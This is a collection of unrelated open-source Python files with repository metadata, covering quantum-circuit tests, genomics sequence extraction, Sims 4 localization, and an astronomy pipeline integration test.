- BVlanTpId (number): The tag priority identifier for base VLAN.
- BaseVid (number): The Base VLAN ID. The default value is 1. The maximum value is 4095. The minimum value is 0.
- EctAlgorithm (number): The SPB Equal Cost Tree (ECT) algorithm. The default algorithm is 01-80-C2-01.
- UseFlag (bool): Set to true to activate the user flag.
Raises
------
- ServerError: The server has encountered an uncategorized error condition
"""
return self._update(self._map_locals(self._SDM_ATT_MAP, locals()))
def add(self, BVlanPriority=None, BVlanTpId=None, BaseVid=None, EctAlgorithm=None, UseFlag=None):
"""Adds a new spbmNodeBaseVidRange resource on the server and adds it to the container.
Args
----
- BVlanPriority (number): The user priority of the Base VLAN.
- BVlanTpId (number): The tag priority identifier for base VLAN.
- BaseVid (number): The Base VLAN ID. The default value is 1. The maximum value is 4095. The minimum value is 0.
- EctAlgorithm (number): The SPB Equal Cost Tree (ECT) algorithm. The default algorithm is 01-80-C2-01.
- UseFlag (bool): Set to true to activate the user flag.
Returns
-------
- self: This instance with all currently retrieved spbmNodeBaseVidRange resources using find and the newly added spbmNodeBaseVidRange resources available through an iterator or index
Raises
------
- ServerError: The server has encountered an uncategorized error condition
"""
return self._create(self._map_locals(self._SDM_ATT_MAP, locals()))
def remove(self):
"""Deletes all the contained spbmNodeBaseVidRange resources in this instance from the server.
Raises
------
- NotFoundError: The requested resource does not exist on the server
- ServerError: The server has encountered an uncategorized error condition
"""
self._delete()
def find(self, BVlanPriority=None, BVlanTpId=None, BaseVid=None, EctAlgorithm=None, UseFlag=None):
"""Finds and retrieves spbmNodeBaseVidRange resources from the server.
All named parameters are evaluated on the server using regex. The named parameters can be used to selectively retrieve spbmNodeBaseVidRange resources from the server.
To retrieve an exact match ensure the parameter value starts with ^ and ends with $
By default the find method takes no parameters and will retrieve all spbmNodeBaseVidRange resources from the server.
Args
----
- BVlanPriority (number): The user priority of the Base VLAN.
- BVlanTpId (number): The tag priority identifier for base VLAN.
- BaseVid (number): The Base VLAN ID. The default value is 1. The maximum value is 4095. The minimum value is 0.
- EctAlgorithm (number): The SPB Equal Cost Tree (ECT) algorithm. The default algorithm is 01-80-C2-01.
- UseFlag (bool): Set to true to activate the user flag.
Returns
-------
- self: This instance with matching spbmNodeBaseVidRange resources retrieved from the server available through an iterator or index
Raises
------
- ServerError: The server has encountered an uncategorized error condition
"""
return self._select(self._map_locals(self._SDM_ATT_MAP, locals()))
def read(self, href):
"""Retrieves a single instance of spbmNodeBaseVidRange data from the server.
Args
----
- href (str): An href to the instance to be retrieved
Returns
-------
- self: This instance with the spbmNodeBaseVidRange resources from the server available through an iterator or index
Raises
------
- NotFoundError: The requested resource does not exist on the server
- ServerError: The server has encountered an uncategorized error condition
"""
return self._read(href)
| [
"[email protected]"
]
| |
847d6cf04f173be81615f171ab5efce76b4cb626 | 7b5828edda7751700ca7002b40a214e39e5f48a8 | /EA/core/sims4/localization/localization_validation.py | 2a309a8565c9d42b05bb9dcda2a6797caada7ad5 | []
| no_license | daniela-venuta/Sims-4-Python-Script-Workspace | 54c33dac02f84daed66f46b7307f222fede0fa62 | f408b28fb34626b2e3b2953152343d591a328d66 | refs/heads/main | 2023-03-29T18:08:39.202803 | 2021-03-30T19:00:42 | 2021-03-30T19:00:42 | 353,111,243 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,400 | py | from protocolbuffers.Localization_pb2 import LocalizedStringToken
import sims4.log
import sims4.reload
logger = sims4.log.Logger('Localization', default_owner='epanero')
with sims4.reload.protected(globals()):
_localized_string_validators = {}
def register_localized_string_validator(validator_gen):
key = validator_gen.__module__ + validator_gen.__qualname__
_localized_string_validators[key] = validator_gen
def get_all_strings_to_validate_gen():
for validator_gen in _localized_string_validators.values():
try:
for localized_string_msg in validator_gen():
if localized_string_msg.hash:
yield localized_string_msg
except Exception as ex:
logger.error('Validator {} threw an exception: {}', validator_gen, ex)
class _LocalizationValidatorPlaceholderSim:
def __init__(self, is_female=False):
self._first_name = 'Jane' if is_female else 'John'
self._last_name = 'Doe'
self._is_female = is_female
def populate_localization_token(self, token):
token.type = LocalizedStringToken.SIM
token.first_name = self._first_name
token.last_name = self._last_name
token.is_female = self._is_female
def get_random_localization_token_sim(*args, **kwargs):
return _LocalizationValidatorPlaceholderSim(*args, **kwargs)
| [
"[email protected]"
]
| |
5275b4089eb109d30621e280794a8c6e7ffdb7c3 | 8629f82f971f4e036c2b6358fe353a2c88bfd098 | /scripts/extract_sequences.py | 7c9b28f7fd0a5f74999951dd2fde3dae357dfaa0 | [
"MIT"
]
| permissive | mahajrod/MAVR | 92828fa1c191b5f8ed08f1ba33f1684df09742cd | 8c57ff5519f130357e36e6f12868bc997e52a8a7 | refs/heads/master | 2023-08-25T01:02:24.738724 | 2023-08-22T15:13:39 | 2023-08-22T15:13:39 | 21,181,911 | 11 | 6 | null | 2017-09-18T20:25:16 | 2014-06-24T21:45:57 | Python | UTF-8 | Python | false | false | 1,793 | py | #!/usr/bin/env python2
__author__ = 'mahajrod'
import argparse
import os
from Bio import SeqIO
from BCBio import GFF
parser = argparse.ArgumentParser()
parser.add_argument("-g", "--in_gff", action="store", dest="in_gff",
help="input gff file")
parser.add_argument("-i", "--in_fasta", action="store", dest="in_fasta",
help="input fasta file")
parser.add_argument("-o", "--out_fasta", action="store", dest="out_fasta",
help="output fasta file")
args = parser.parse_args()
#sequence_dict = SeqIO.index_db("temp_index.idx", [args.in_fasta], format="fasta")
sequence_dict = SeqIO.to_dict(SeqIO.parse(args.in_fasta, format="fasta"))
annotated_dict = {}
with open(args.in_gff, "r") as gff_fd:
for record in GFF.parse(gff_fd, base_dict=sequence_dict):
annotated_dict[record.id] = record
#print(annotated_dict['2R'].features[25])
with open(args.out_fasta, "w") as out_fd:
for record in annotated_dict:
for feature in annotated_dict[record].features:
#print(feature.qualifiers)
feature_location = "%s:%s-%s:%s" % (record, feature.location.start,
feature.location.end, feature.location.strand)
feature_id = ",".join(feature.qualifiers["Parent"]) if "Parent" in feature.qualifiers \
else ",".join(feature.qualifiers["ID"]) if "ID" in feature.qualifiers else "."
feature_name = ",".join(feature.qualifiers["Name"]) if "Name" in feature.qualifiers else "."
feature_seq = feature.extract(annotated_dict[record].seq)
out_fd.write(">%s|%s|%s\n" % (feature_location, feature_id, feature_name))
out_fd.write(str(feature_seq) + "\n")
#os.system("rm temp_index.idx") | [
"[email protected]"
]
| |
f6ee5d38a811b0ba42a5f7020eb5532521567215 | f13c586b82224c07f28f7bb7d9dd503e64eb5cb2 | /tests/devices/qubit/test_apply_operation.py | 7895bdba75985e2cdcf0307adf762afe607fd019 | [
"Apache-2.0"
]
| permissive | therooler/pennylane | 095f104e40254be2ed3050bc7be9ea9d2ee11ebd | fde1f24bd784d6ee2af5c980c2d5010b4c2bbe54 | refs/heads/master | 2023-04-29T13:32:43.115108 | 2023-04-18T09:41:42 | 2023-04-18T09:41:42 | 202,356,685 | 0 | 0 | Apache-2.0 | 2019-08-14T13:30:39 | 2019-08-14T13:30:38 | null | UTF-8 | Python | false | false | 17,022 | py | # Copyright 2018-2023 Xanadu Quantum Technologies Inc.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Tests the apply_operation functions from devices/qubit
"""
import pytest
import numpy as np
from scipy.stats import unitary_group
import pennylane as qml
from pennylane.devices.qubit.apply_operation import (
apply_operation,
apply_operation_einsum,
apply_operation_tensordot,
)
ml_frameworks_list = [
"numpy",
pytest.param("autograd", marks=pytest.mark.autograd),
pytest.param("jax", marks=pytest.mark.jax),
pytest.param("torch", marks=pytest.mark.torch),
pytest.param("tensorflow", marks=pytest.mark.tf),
]
methods = [apply_operation_einsum, apply_operation_tensordot, apply_operation]
def test_custom_operator_with_matrix():
"""Test that apply_operation works with any operation that defines a matrix."""
mat = np.array(
[
[0.39918205 + 0.3024376j, -0.86421077 + 0.04821758j],
[0.73240679 + 0.46126509j, 0.49576832 - 0.07091251j],
]
)
# pylint: disable=too-few-public-methods
class CustomOp(qml.operation.Operation):
num_wires = 1
def matrix(self):
return mat
state = np.array([-0.30688912 - 0.4768824j, 0.8100052 - 0.14931113j])
new_state = apply_operation(CustomOp(0), state)
assert qml.math.allclose(new_state, mat @ state)
@pytest.mark.parametrize("ml_framework", ml_frameworks_list)
@pytest.mark.parametrize("method", methods)
@pytest.mark.parametrize("wire", (0, 1))
class TestTwoQubitStateSpecialCases:
"""Test the special cases on a two qubit state. Also tests the special cases for einsum and tensor application methods
for additional testing of these generic matrix application methods."""
def test_paulix(self, method, wire, ml_framework):
"""Test the application of a paulix gate on a two qubit state."""
initial_state = np.array(
[
[0.04624539 + 0.3895457j, 0.22399401 + 0.53870339j],
[-0.483054 + 0.2468498j, -0.02772249 - 0.45901669j],
]
)
initial_state = qml.math.asarray(initial_state, like=ml_framework)
new_state = method(qml.PauliX(wire), initial_state)
initial0dim = qml.math.take(initial_state, 0, axis=wire)
new1dim = qml.math.take(new_state, 1, axis=wire)
assert qml.math.allclose(initial0dim, new1dim)
initial1dim = qml.math.take(initial_state, 1, axis=wire)
new0dim = qml.math.take(new_state, 0, axis=wire)
assert qml.math.allclose(initial1dim, new0dim)
def test_pauliz(self, method, wire, ml_framework):
"""Test the application of a pauliz gate on a two qubit state."""
initial_state = np.array(
[
[0.04624539 + 0.3895457j, 0.22399401 + 0.53870339j],
[-0.483054 + 0.2468498j, -0.02772249 - 0.45901669j],
]
)
initial_state = qml.math.asarray(initial_state, like=ml_framework)
new_state = method(qml.PauliZ(wire), initial_state)
initial0 = qml.math.take(initial_state, 0, axis=wire)
new0 = qml.math.take(new_state, 0, axis=wire)
assert qml.math.allclose(initial0, new0)
initial1 = qml.math.take(initial_state, 1, axis=wire)
new1 = qml.math.take(new_state, 1, axis=wire)
assert qml.math.allclose(initial1, -new1)
def test_pauliy(self, method, wire, ml_framework):
"""Test the application of a pauliy gate on a two qubit state."""
initial_state = np.array(
[
[0.04624539 + 0.3895457j, 0.22399401 + 0.53870339j],
[-0.483054 + 0.2468498j, -0.02772249 - 0.45901669j],
]
)
initial_state = qml.math.asarray(initial_state, like=ml_framework)
new_state = method(qml.PauliY(wire), initial_state)
initial0 = qml.math.take(initial_state, 0, axis=wire)
new1 = qml.math.take(new_state, 1, axis=wire)
assert qml.math.allclose(1j * initial0, new1)
initial1 = qml.math.take(initial_state, 1, axis=wire)
new0 = qml.math.take(new_state, 0, axis=wire)
assert qml.math.allclose(-1j * initial1, new0)
def test_hadamard(self, method, wire, ml_framework):
"""Test the application of a hadamard on a two qubit state."""
initial_state = np.array(
[
[0.04624539 + 0.3895457j, 0.22399401 + 0.53870339j],
[-0.483054 + 0.2468498j, -0.02772249 - 0.45901669j],
]
)
initial_state = qml.math.asarray(initial_state, like=ml_framework)
new_state = method(qml.Hadamard(wire), initial_state)
inv_sqrt2 = 1 / np.sqrt(2)
initial0 = qml.math.take(initial_state, 0, axis=wire)
initial1 = qml.math.take(initial_state, 1, axis=wire)
expected0 = inv_sqrt2 * (initial0 + initial1)
new0 = qml.math.take(new_state, 0, axis=wire)
assert qml.math.allclose(new0, expected0)
expected1 = inv_sqrt2 * (initial0 - initial1)
new1 = qml.math.take(new_state, 1, axis=wire)
assert qml.math.allclose(new1, expected1)
def test_phaseshift(self, method, wire, ml_framework):
"""test the application of a phaseshift gate on a two qubit state."""
initial_state = np.array(
[
[0.04624539 + 0.3895457j, 0.22399401 + 0.53870339j],
[-0.483054 + 0.2468498j, -0.02772249 - 0.45901669j],
]
)
initial_state = qml.math.asarray(initial_state, like=ml_framework)
phase = qml.math.asarray(-2.3, like=ml_framework)
shift = np.exp(qml.math.multiply(1j, phase))
new_state = method(qml.PhaseShift(phase, wire), initial_state)
new0 = qml.math.take(new_state, 0, axis=wire)
initial0 = qml.math.take(initial_state, 0, axis=wire)
assert qml.math.allclose(new0, initial0)
initial1 = qml.math.take(initial_state, 1, axis=wire)
new1 = qml.math.take(new_state, 1, axis=wire)
assert qml.math.allclose(shift * initial1, new1)
def test_cnot(self, method, wire, ml_framework):
"""Test the application of a cnot gate on a two qubit state."""
initial_state = np.array(
[
[0.04624539 + 0.3895457j, 0.22399401 + 0.53870339j],
[-0.483054 + 0.2468498j, -0.02772249 - 0.45901669j],
]
)
initial_state = qml.math.asarray(initial_state, like=ml_framework)
control = wire
target = int(not control)
new_state = method(qml.CNOT((control, target)), initial_state)
initial0 = qml.math.take(initial_state, 0, axis=control)
new0 = qml.math.take(new_state, 0, axis=control)
assert qml.math.allclose(initial0, new0)
initial1 = qml.math.take(initial_state, 1, axis=control)
new1 = qml.math.take(new_state, 1, axis=control)
assert qml.math.allclose(initial1[1], new1[0])
assert qml.math.allclose(initial1[0], new1[1])
@pytest.mark.parametrize("method", methods)
class TestRXCalcGrad:
"""Tests the application and differentiation of an RX gate in the different interfaces."""
state = np.array(
[
[
[-0.22209168 + 0.21687383j, -0.1302055 - 0.06014422j],
[-0.24033117 + 0.28282153j, -0.14025702 - 0.13125938j],
],
[
[-0.42373896 + 0.51912421j, -0.01934135 + 0.07422255j],
[0.22311677 + 0.2245953j, 0.33154166 + 0.20820744j],
],
]
)
def compare_expected_result(self, phi, state, new_state, g):
expected0 = np.cos(phi / 2) * state[0, :, :] + -1j * np.sin(phi / 2) * state[1, :, :]
expected1 = -1j * np.sin(phi / 2) * state[0, :, :] + np.cos(phi / 2) * state[1, :, :]
assert qml.math.allclose(new_state[0, :, :], expected0)
assert qml.math.allclose(new_state[1, :, :], expected1)
g_expected0 = (
-0.5 * np.sin(phi / 2) * state[0, :, :] - 0.5j * np.cos(phi / 2) * state[1, :, :]
)
g_expected1 = (
-0.5j * np.cos(phi / 2) * state[0, :, :] - 0.5 * np.sin(phi / 2) * state[1, :, :]
)
assert qml.math.allclose(g[0], g_expected0)
assert qml.math.allclose(g[1], g_expected1)
@pytest.mark.autograd
def test_rx_grad_autograd(self, method):
"""Test that the application of an rx gate is differentiable with autograd."""
state = qml.numpy.array(self.state)
def f(phi):
op = qml.RX(phi, wires=0)
return method(op, state)
phi = qml.numpy.array(0.325 + 0j, requires_grad=True)
new_state = f(phi)
g = qml.jacobian(lambda x: qml.math.real(f(x)))(phi)
self.compare_expected_result(phi, state, new_state, g)
@pytest.mark.jax
@pytest.mark.parametrize("use_jit", (True, False))
def test_rx_grad_jax(self, method, use_jit):
"""Test that the application of an rx gate is differentiable with jax."""
import jax
state = jax.numpy.array(self.state)
def f(phi):
op = qml.RX(phi, wires=0)
return method(op, state)
if use_jit:
f = jax.jit(f)
phi = 0.325
new_state = f(phi)
g = jax.jacobian(f, holomorphic=True)(phi + 0j)
self.compare_expected_result(phi, state, new_state, g)
@pytest.mark.torch
def test_rx_grad_torch(self, method):
"""Tests the application and differentiation of an rx gate with torch."""
import torch
state = torch.tensor(self.state)
def f(phi):
op = qml.RX(phi, wires=0)
return method(op, state)
phi = torch.tensor(0.325, requires_grad=True)
new_state = f(phi)
g = torch.autograd.functional.jacobian(f, phi + 0j)
# torch takes gradient with respect to conj(z), so we need to conj the gradient
g = torch.conj(g).resolve_conj()
self.compare_expected_result(
phi.detach().numpy(),
state.detach().numpy(),
new_state.detach().numpy(),
g.detach().numpy(),
)
@pytest.mark.tf
def test_rx_grad_tf(self, method):
"""Tests the application and differentiation of an rx gate with tensorflow"""
import tensorflow as tf
state = tf.Variable(self.state)
phi = tf.Variable(0.8589 + 0j)
with tf.GradientTape() as grad_tape:
op = qml.RX(phi, wires=0)
new_state = method(op, state)
grads = grad_tape.jacobian(new_state, [phi])
# tf takes gradient with respect to conj(z), so we need to conj the gradient
phi_grad = tf.math.conj(grads[0])
self.compare_expected_result(phi, state, new_state, phi_grad)
@pytest.mark.parametrize("ml_framework", ml_frameworks_list)
@pytest.mark.parametrize("method", methods)
class TestBroadcasting: # pylint: disable=too-few-public-methods
"""Tests that broadcasted operations are applied correctly."""
broadcasted_ops = [
qml.RX(np.array([np.pi, np.pi / 2, np.pi / 4]), wires=2),
qml.PhaseShift(np.array([np.pi, np.pi / 2, np.pi / 4]), wires=2),
qml.IsingXX(np.array([np.pi, np.pi / 2, np.pi / 4]), wires=[1, 2]),
qml.QubitUnitary(
np.array([unitary_group.rvs(8), unitary_group.rvs(8), unitary_group.rvs(8)]),
wires=[0, 1, 2],
),
]
unbroadcasted_ops = [
qml.PauliX(2),
qml.PauliZ(2),
qml.CNOT([1, 2]),
qml.RX(np.pi, wires=2),
qml.PhaseShift(np.pi / 2, wires=2),
qml.IsingXX(np.pi / 2, wires=[1, 2]),
qml.QubitUnitary(unitary_group.rvs(8), wires=[0, 1, 2]),
]
@pytest.mark.parametrize("op", broadcasted_ops)
def test_broadcasted_op(self, op, method, ml_framework):
"""Tests that batched operations are applied correctly to an unbatched state."""
state = np.ones((2, 2, 2)) / np.sqrt(8)
res = method(op, qml.math.asarray(state, like=ml_framework))
missing_wires = 3 - len(op.wires)
mat = op.matrix()
expanded_mat = [
np.kron(np.eye(2**missing_wires), mat[i]) if missing_wires else mat[i]
for i in range(3)
]
expected = [(expanded_mat[i] @ state.flatten()).reshape((2, 2, 2)) for i in range(3)]
assert qml.math.get_interface(res) == ml_framework
assert qml.math.allclose(res, expected)
@pytest.mark.parametrize("op", unbroadcasted_ops)
def test_broadcasted_state(self, op, method, ml_framework):
"""Tests that unbatched operations are applied correctly to a batched state."""
state = np.ones((3, 2, 2, 2)) / np.sqrt(8)
res = method(op, qml.math.asarray(state, like=ml_framework), is_state_batched=True)
missing_wires = 3 - len(op.wires)
mat = op.matrix()
expanded_mat = np.kron(np.eye(2**missing_wires), mat) if missing_wires else mat
expected = [(expanded_mat @ state[i].flatten()).reshape((2, 2, 2)) for i in range(3)]
assert qml.math.get_interface(res) == ml_framework
assert qml.math.allclose(res, expected)
@pytest.mark.parametrize("op", broadcasted_ops)
def test_broadcasted_op_broadcasted_state(self, op, method, ml_framework):
"""Tests that batched operations are applied correctly to a batched state."""
if method is apply_operation_tensordot:
pytest.skip("Tensordot doesn't support batched operator and batched state.")
state = np.ones((3, 2, 2, 2)) / np.sqrt(8)
res = method(op, qml.math.asarray(state, like=ml_framework), is_state_batched=True)
missing_wires = 3 - len(op.wires)
mat = op.matrix()
expanded_mat = [
np.kron(np.eye(2**missing_wires), mat[i]) if missing_wires else mat[i]
for i in range(3)
]
expected = [(expanded_mat[i] @ state[i].flatten()).reshape((2, 2, 2)) for i in range(3)]
assert qml.math.get_interface(res) == ml_framework
assert qml.math.allclose(res, expected)
@pytest.mark.parametrize("method", methods)
class TestLargerOperations:
"""Tests matrix applications on states and operations with larger numbers of wires."""
state = np.array(
[
[
[
[-0.21733955 - 0.01990267j, 0.22960893 - 0.0312392j],
[0.21406652 - 0.07552019j, 0.09527143 + 0.01870987j],
],
[
[0.05603182 - 0.26879067j, -0.02755183 - 0.03097822j],
[-0.43962358 - 0.17435254j, 0.12820737 + 0.06794554j],
],
],
[
[
[-0.09270161 - 0.3132961j, -0.03276799 + 0.07557535j],
[-0.15712707 - 0.32666969j, -0.00898954 + 0.1324474j],
],
[
[-0.17760532 + 0.08415488j, -0.26872752 - 0.05767781j],
[0.23142582 - 0.1970496j, 0.15483611 - 0.15100495j],
],
],
]
)
def test_multicontrolledx(self, method):
"""Tests a four qubit multi-controlled x gate."""
new_state = method(qml.MultiControlledX(wires=(0, 1, 2, 3)), self.state)
expected_state = np.copy(self.state)
expected_state[1, 1, 1, 1] = self.state[1, 1, 1, 0]
expected_state[1, 1, 1, 0] = self.state[1, 1, 1, 1]
assert qml.math.allclose(new_state, expected_state)
def test_double_excitation(self, method):
"""Tests a double excitation operation compared to its decomposition."""
op = qml.DoubleExcitation(np.array(2.14), wires=(3, 1, 2, 0))
state_v1 = method(op, self.state)
state_v2 = self.state
for d_op in op.decomposition():
state_v2 = method(d_op, state_v2)
assert qml.math.allclose(state_v1, state_v2)
@pytest.mark.tf
@pytest.mark.parametrize("op", (qml.PauliZ(8), qml.CNOT((5, 6))))
def test_tf_large_state(op):
""" "Tests that custom kernels that use slicing fall back to a different method when
the state has a large number of wires."""
import tensorflow as tf
state = np.zeros([2] * 10)
state = tf.Variable(state)
new_state = apply_operation(op, state)
# still all zeros. Mostly just making sure error not raised
assert qml.math.allclose(state, new_state)
| [
"[email protected]"
]
| |
c9fa9b364091e379c4cc912b154200787e702303 | 776cf3b0f5865c8639692e1256abb5ad493c9f92 | /__old_stuff/pga/pga_no_sort/maps.py | b5503e9085e62d6d3cdc696a8de88c13ab354728 | []
| no_license | ralphbean/ms-thesis | 90afb1d5729d83f1910d8dec2e6d4c65d0304bc0 | 3fea08aa069d735fb7048afbab37bb429800fb48 | refs/heads/master | 2021-01-19T11:28:14.382925 | 2012-01-25T15:24:54 | 2012-01-25T15:24:54 | 3,265,816 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 666 | py | #!/usr/bin/python
from math import cos, sin, atan2, sqrt
# Some constants:
e = 2.71828183
mu = 5.5
a = 5
b = 25
W = [[ -a, a], [-b, b]]
def sigmoid( x, mu ):
return [( 1 + e**(-mu * ele))**-1 for ele in x]
def logistic( X, mu):
Y = [X[0], X[1]]
Y[0] = Y[0] * ( 1.0 - Y[0]) * mu
Y[1] = Y[1] * ( 1.0 - Y[1]) * mu
return Y
def squeezer( X, a ):
x = X[0]
y = X[1]
u = x
v = y/2.0 + (sqrt(1-x**2))/2.0
r = sqrt(v**2 + u**2)
theta = 2 * atan2(u,v)
u = a * r * cos(theta)
v = r * sin(theta)
Y = [u, v]
return Y
def network( x ):
return sigmoid( [-a * x[0] + a * x[1], -b * x[0] + b * x[1] ], mu )
| [
"[email protected]"
]
| |
7b9565c9c890f3721eb0cfe90417c25a5f7cd443 | f07b0142e37afe0bf8ed4d56399a0a49f5b1801b | /lino_xl/lib/phones/choicelists.py | f28f05d7ebd96e388d405b39764b669f8fb987a4 | [
"BSD-2-Clause"
]
| permissive | khchine5/xl | af70fb21e4caeb05ff62e9618113c278d71a75ed | b1634937a9ce87af1e948eb712b934b11f221d9d | refs/heads/master | 2021-01-20T22:51:01.193260 | 2018-08-22T07:47:43 | 2018-08-22T07:47:43 | 52,145,840 | 1 | 0 | BSD-2-Clause | 2018-08-19T12:29:06 | 2016-02-20T09:21:19 | Python | UTF-8 | Python | false | false | 1,501 | py | # Copyright 2017 Luc Saffre
#
# License: BSD (see file COPYING for details)
from django.core.validators import validate_email, URLValidator
from etgen.html import E
from lino.api import dd, _
from lino.modlib.office.roles import OfficeStaff
validate_url = URLValidator()
class ContactDetailType(dd.Choice):
field_name = None
def format(self, value):
return value
def validate(self, value):
return value
def as_html(self, obj, ar):
return obj.value
STD = ContactDetailType
class EMAIL(ContactDetailType):
def validate(self, value):
validate_email(value)
def as_html(self, obj, ar):
return E.a(obj.value, href="mailto:" + obj.value)
class URL(ContactDetailType):
def validate(self, value):
validate_url(value)
def as_html(self, obj, ar):
txt = obj.remark or obj.value
return E.a(txt, href=obj.value)
class ContactDetailTypes(dd.ChoiceList):
required_roles = dd.login_required(OfficeStaff)
verbose_name = _("Contact detail type")
verbose_name_plural = _("Contact detail types")
item_class = ContactDetailType
add = ContactDetailTypes.add_item_instance
add(EMAIL('010', _("E-Mail"), 'email', field_name="email"))
add(STD('020', _("Mobile"), 'gsm', field_name="gsm"))
add(STD('030', _("Phone"), 'phone', field_name="phone"))
add(URL('040', _("Website"), 'url', field_name="url"))
add(STD('050', _("Fax"), 'fax', field_name="fax"))
add(STD('090', _("Other"), 'other'))
| [
"[email protected]"
]
| |
cdc23af2384a0e3b2df21f4083a35ba0ea45409d | f332e3028a5d8fb8a9c09f7f84e249c063e2a561 | /admit/at/test/integrationtest_moment.py | ae28d020b133d1c2c01fe6aed178cb278bb54aee | [
"MIT"
]
| permissive | astroumd/admit | 48098dc0490813467317dda4388c6de832ed8772 | bbf3d79bb6e1a6f7523553ed8ede0d358d106f2c | refs/heads/master | 2023-03-11T17:51:12.944237 | 2020-09-09T16:17:59 | 2020-09-09T16:17:59 | 69,020,469 | 4 | 2 | null | 2018-09-26T21:07:17 | 2016-09-23T11:54:08 | Python | UTF-8 | Python | false | false | 4,739 | py | #! /usr/bin/env casarun
#
#
# you can either use the "import" method from within casapy
# or use the casarun shortcut to run this from a unix shell
# with the argument being the casa image file to be processed
#
""" Right now you need to run this test inside of casapy
This test does the following:
creates an admit class
creates a moment AT
sets some moment parameters
adds the moment AT to the admit class
runs admit (which in turn runs the needed AT's)
writes the results out to disk
reads them into a new admit instance
prints out one of the BDP xml file names
to run this test do the following:
import admit.at.test.test_moment as tm
tm.run(<filename>) <filename> is the name of the image file to be processed (note for the time being you need to be in the directory containing the image file
"""
import admit
import unittest
import os
class IntegTestMomentAT(unittest.TestCase):
def setUp(self):
self.root = admit.utils.admit_root()
self.inputFile = self.root + "/admit/at/test/mom_integ_test_input.fits"
self.admitdir = self.root + "/admit/at/test/mom_integ_test_input.admit"
self.testoutput = self.root+"/INTEGTESTRESULT"
self.success = "FAILED"
self.cleanup()
def tearDown(self):
self.cleanup()
self.cleanlogs()
f = open(self.testoutput,"a")
f.write(self.success+ " "+self.__class__.__name__ + "\n")
f.close()
def cleanup(self):
try:
cmd = "/bin/rm -rf %s*" % self.admitdir
os.system( cmd )
except Exception as ex :
print "failed to remove admit dir %s :" % self.admit_dir
print ex
# cleanlogs is separate because we don't want to remove logs we might
# be writing to.
def cleanlogs(self):
try:
os.system("/bin/rm -rf ipython*.log")
except:
print "failed to remove ipython logs"
try:
os.system("/bin/rm -rf casapy*.log")
except:
print "failed to remove casapy logs"
# Call the main method runTest() for automatic running.
#
# NB: don't use "run()" - it conflicts unittest.TestCase run()
# method and you get side effects, e.g. fileName =
# <unittest.runner.TextTestResult run=0 errors=0 failures=0>
#
def runTest(self):
try:
# instantiate the Admit class
a = admit.Project(self.admitdir)
# set up to write out figure files
a.plotparams(admit.PlotControl.BATCH,admit.PlotControl.PNG)
fitsin = admit.Ingest_AT(file=self.inputFile)
task0id = a.addtask(fitsin)
# instantiate a moment AT and set some moment parameters
m = admit.Moment_AT()
m.setkey('moments',[0,1,2])
m.setkey('sigma',0.005)
m.setkey('numsigma',[3.0])
task1id = a.addtask(m,[(task0id,0)])
# check the fm
a.fm.verify()
# run admit
a.run()
# save it out to disk.
a.write()
a2 = admit.Project(self.admitdir) # read in the admit.xml and bdp files
self.assertEqual(len(a.fm),len(a2.fm))
for atask in a.fm:
self.assertEqual(len(a.fm[atask]._bdp_out),
len(a2.fm[atask]._bdp_out))
# Note: we don't check bdp_in because they are connected
# "just in time" so will be set None up read-in.
self.assertEqual(a.fm._connmap,a2.fm._connmap)
for at in a.fm:
for i in range(len(a.fm[at]._bdp_out)) :
self.assertEqual( a.fm[at]._bdp_out[i]._taskid,
a2.fm[at]._bdp_out[i]._taskid)
self.assertEqual( a.fm[at]._bdp_out[i].xmlFile,
a2.fm[at]._bdp_out[i].xmlFile)
self.success = "OK"
except Exception, e:
m = "exception=%s, file=%s, lineno=%s" % ( sys.exc_info()[0].__name__, os.path.basename(sys.exc_info()[2].tb_frame.f_code.co_filename), sys.exc_info()[2].tb_lineno)
self.success = "FAILED"
traceback.print_exc()
self.fail("%s failed with: %s" % (self.__class__.__name__ , m))
###############################################################################
# END CLASS #
###############################################################################
suite = unittest.TestLoader().loadTestsFromTestCase(IntegTestMomentAT)
unittest.TextTestRunner(verbosity=0).run(suite)
| [
"[email protected]"
]
| |
3441be0b35ed322cb32bf6ba5f4e7431d88160a2 | acb8e84e3b9c987fcab341f799f41d5a5ec4d587 | /langs/5/nsj.py | f710dc66040e9b9bd32fa4cffb1a45033aa46a3b | []
| no_license | G4te-Keep3r/HowdyHackers | 46bfad63eafe5ac515da363e1c75fa6f4b9bca32 | fb6d391aaecb60ab5c4650d4ae2ddd599fd85db2 | refs/heads/master | 2020-08-01T12:08:10.782018 | 2016-11-13T20:45:50 | 2016-11-13T20:45:50 | 73,624,224 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 486 | py | import sys
def printFunction(lineRemaining):
if lineRemaining[0] == '"' and lineRemaining[-1] == '"':
if len(lineRemaining) > 2:
#data to print
lineRemaining = lineRemaining[1:-1]
print ' '.join(lineRemaining)
else:
print
def main(fileName):
with open(fileName) as f:
for line in f:
data = line.split()
if data[0] == 'nsJ':
printFunction(data[1:])
else:
print 'ERROR'
return
if __name__ == '__main__':
main(sys.argv[1]) | [
"[email protected]"
]
| |
760438c3af5adf7bfb936c3a780f4284e5c4c8c5 | bd87d8947878ccb2f5b720e70a22493b00868fd3 | /justpy/02_basics/hello.py | 2888edfd040f2b33e125af2a67c8b73a03f4132e | []
| no_license | damiansp/completePython | 4cbf12ef682a1d4a5498f77e407dc02e44a7d7ac | 3f5e2f14d79c93df5147b82d901190c054535158 | refs/heads/master | 2023-09-01T20:50:03.444440 | 2023-08-28T00:27:57 | 2023-08-28T00:27:57 | 99,197,610 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 131 | py | import justpy as jp
def hello():
wp = jp.WebPage()
p = jp.P(text='Hello, World!', a=wp)
return wp
jp.justpy(hello)
| [
"[email protected]"
]
| |
67369667933e56134fd39641a2ff54257295372e | f92dfdebb4bf6bc108f51783333520c35afa66da | /admin-web/src/www/application/modules/exon/actions.py | 0f983721c26d50584b6b180491a8a68d2dd6eca0 | []
